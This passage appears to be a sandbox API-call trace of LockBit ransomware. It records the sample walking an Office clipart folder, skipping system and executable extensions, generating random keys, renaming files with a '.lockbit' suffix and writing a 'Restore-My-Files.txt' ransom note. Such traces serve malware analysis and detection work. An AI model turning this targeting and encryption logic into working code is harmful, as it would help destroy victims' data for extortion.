(lpString1=".", lpString2="J0309902.WMF") returned -1 [0158.673] lstrcmpiW (lpString1="..", lpString2="J0309902.WMF") returned -1 [0158.673] PathFindExtensionW (pszPath="J0309902.WMF") returned=".WMF" [0158.673] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.673] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.673] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.674] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.675] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.675] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309902.WMF") returned 1 [0158.676] lstrcmpiW (lpString1="ntldr", lpString2="J0309902.WMF") returned 1 [0158.676] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309902.WMF") returned 1 [0158.676] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309902.WMF") returned -1 [0158.676] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309902.WMF") returned -1 [0158.676] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309902.WMF") returned 1 [0158.676] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309902.WMF") returned -1 [0158.676] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.676] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309902.WMF") returned=".WMF" [0158.676] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.676] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.676] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.677] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.677] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309902.WMF.lockbit") returned 72 [0158.677] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309902.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309902.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.678] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.678] malloc (_Size=0x40068) returned 0x3df0008 [0158.679] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6656) returned 1 [0158.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.680] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0158.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309902.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309902.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.686] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.687] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0158.687] free (_Block=0x1fa2ed8) [0158.687] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309902.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.687] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.687] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.687] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc6d100, ftCreationTime.dwHighDateTime=0x1bf5cb6, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5cc6d100, ftLastWriteTime.dwHighDateTime=0x1bf5cb6, nFileSizeHigh=0x0, nFileSizeLow=0x20e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309904.WMF", cAlternateFileName="")) returned 1 [0158.687] lstrcmpiW (lpString1=".", lpString2="J0309904.WMF") returned -1 [0158.687] lstrcmpiW (lpString1="..", lpString2="J0309904.WMF") returned -1 [0158.687] PathFindExtensionW (pszPath="J0309904.WMF") returned=".WMF" [0158.687] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.687] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.687] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.687] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.687] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.687] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.687] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.687] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.688] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.688] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309904.WMF") returned 1 [0158.689] lstrcmpiW (lpString1="ntldr", lpString2="J0309904.WMF") returned 1 [0158.689] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309904.WMF") returned 1 [0158.689] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309904.WMF") returned -1 [0158.689] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309904.WMF") returned -1 [0158.689] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309904.WMF") returned 1 [0158.689] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309904.WMF") returned -1 [0158.689] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.689] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309904.WMF") returned=".WMF" [0158.689] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.689] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.690] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.690] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.691] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.691] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.691] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.691] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.691] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309904.WMF.lockbit") returned 72 [0158.691] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309904.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309904.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.692] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.692] malloc (_Size=0x40068) returned 0x3df0008 [0158.692] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8420) returned 1 [0158.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.694] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309904.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309904.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.700] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.700] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0158.701] free (_Block=0x1fa2ed8) [0158.701] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309904.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.701] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.701] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea87400, ftCreationTime.dwHighDateTime=0x1bf5cb6, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6ea87400, ftLastWriteTime.dwHighDateTime=0x1bf5cb6, nFileSizeHigh=0x0, nFileSizeLow=0x2b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309920.WMF", cAlternateFileName="")) returned 1 [0158.701] lstrcmpiW (lpString1=".", lpString2="J0309920.WMF") returned -1 [0158.701] lstrcmpiW (lpString1="..", lpString2="J0309920.WMF") returned -1 [0158.701] PathFindExtensionW (pszPath="J0309920.WMF") returned=".WMF" [0158.701] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.702] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.703] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.703] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309920.WMF") returned 1 [0158.704] lstrcmpiW (lpString1="ntldr", lpString2="J0309920.WMF") returned 1 [0158.704] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309920.WMF") returned 1 [0158.704] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309920.WMF") returned -1 [0158.704] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309920.WMF") returned -1 [0158.704] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309920.WMF") returned 1 [0158.704] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309920.WMF") returned -1 [0158.704] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.704] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309920.WMF") returned=".WMF" [0158.704] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.704] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.704] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.705] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.705] 